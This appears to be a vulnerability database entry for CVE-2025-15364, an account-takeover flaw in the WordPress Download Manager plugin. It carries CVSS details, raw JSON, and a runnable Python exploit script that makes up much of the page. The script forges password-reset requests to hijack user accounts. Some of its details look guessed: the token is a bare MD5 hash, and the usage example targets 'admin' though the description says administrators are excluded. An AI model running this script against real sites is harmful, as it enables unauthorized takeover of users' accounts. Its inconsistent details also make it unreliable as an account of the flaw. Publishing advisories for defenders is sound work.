Security Vulnerability Report
CVE-2025-15364 CVSS 7.3 HIGH

CVE-2025-15364

Published: 2026-01-06 02:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Download Manager <= 3.3.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import hashlib
import sys
import time

import requests

# CVE-2025-15364 PoC - WordPress Download Manager Account Takeover
# Target: WordPress site with Download Manager plugin <= 3.3.40


def exploit_account_takeover(target_url, username, new_password):
    """
    Exploit for CVE-2025-15364: WordPress Download Manager Privilege Escalation

    Args:
        target_url: Target WordPress site URL
        username: Target username to takeover
        new_password: New password to set

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    # Step 1: Get user ID from username
    user_query_url = f"{target_url}/wp-json/wp/v2/users/?search={username}"
    try:
        response = requests.get(user_query_url, timeout=10)
        if response.status_code == 200:
            users = response.json()
            if users:
                user_id = users[0]['id']
                print(f"[+] Found user ID: {user_id}")
            else:
                print("[-] User not found")
                return False
        else:
            print(f"[-] Failed to query user (status: {response.status_code})")
            return False
    except Exception as e:
        print(f"[-] Error querying user: {e}")
        return False

    # Step 2: Exploit the account takeover vulnerability
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Generate encrypted payload for password reset bypass
    timestamp = str(int(time.time()))
    token = hashlib.md5(f"{username}{timestamp}".encode()).hexdigest()

    payload = {
        'action': 'wpdm_user_dashboard',
        'task': 'reset_password',
        'user_id': user_id,
        'pass1': new_password,
        'pass2': new_password,
        'token': token,
        'timestamp': timestamp,
    }

    try:
        response = requests.post(exploit_url, data=payload, timeout=10)
        if response.status_code == 200:
            content_type = response.headers.get('content-type', '')
            result = response.json() if content_type.find('json') > -1 else {}
            if result.get('success') or 'success' in response.text.lower():
                print(f"[+] Successfully changed password for user: {username}")
                print(f"[+] New password: {new_password}")
                return True
            else:
                print("[-] Password change failed")
                print(f"[-] Response: {response.text[:200]}")
                return False
        else:
            print(f"[-] Exploitation failed (status: {response.status_code})")
            return False
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-15364.py <target_url> <username> <new_password>")
        print("Example: python cve-2025-15364.py http://example.com admin MyNewPass123")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]

    print("[*] CVE-2025-15364 Exploitation")
    print(f"[*] Target: {target}")
    print(f"[*] Target User: {user}")
    exploit_account_takeover(target, user, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15364", "sourceIdentifier": "[email protected]", "published": "2026-01-06T02:15:41.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-353"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.40/src/__/Crypt.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3431915/download-manager#file7", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/067031e8-6aa8-451c-a318-b1848c7a4f92?source=cve", "source": "[email protected]"}]}}